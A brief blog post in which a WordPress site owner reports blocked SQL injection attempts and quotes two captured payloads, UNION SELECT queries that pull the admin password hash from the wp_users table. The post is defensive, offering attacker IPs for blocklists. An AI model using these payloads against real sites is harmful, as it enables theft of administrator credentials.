More Scriptkiddies poking at WordPress

The scriptkiddies have again launched their Super Sad SQL Injection Cannon of Crud (TM) at my site.  I was alerted by my systems that the following attacks were detected and blocked:

  • UNION SELECT CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)) FROM wp_users where id=1/*
  • UNION SELECT null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null FROM wp_users where id=1/*

If anyone is interested, I will pass along the offending IPs for your blocklists.

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>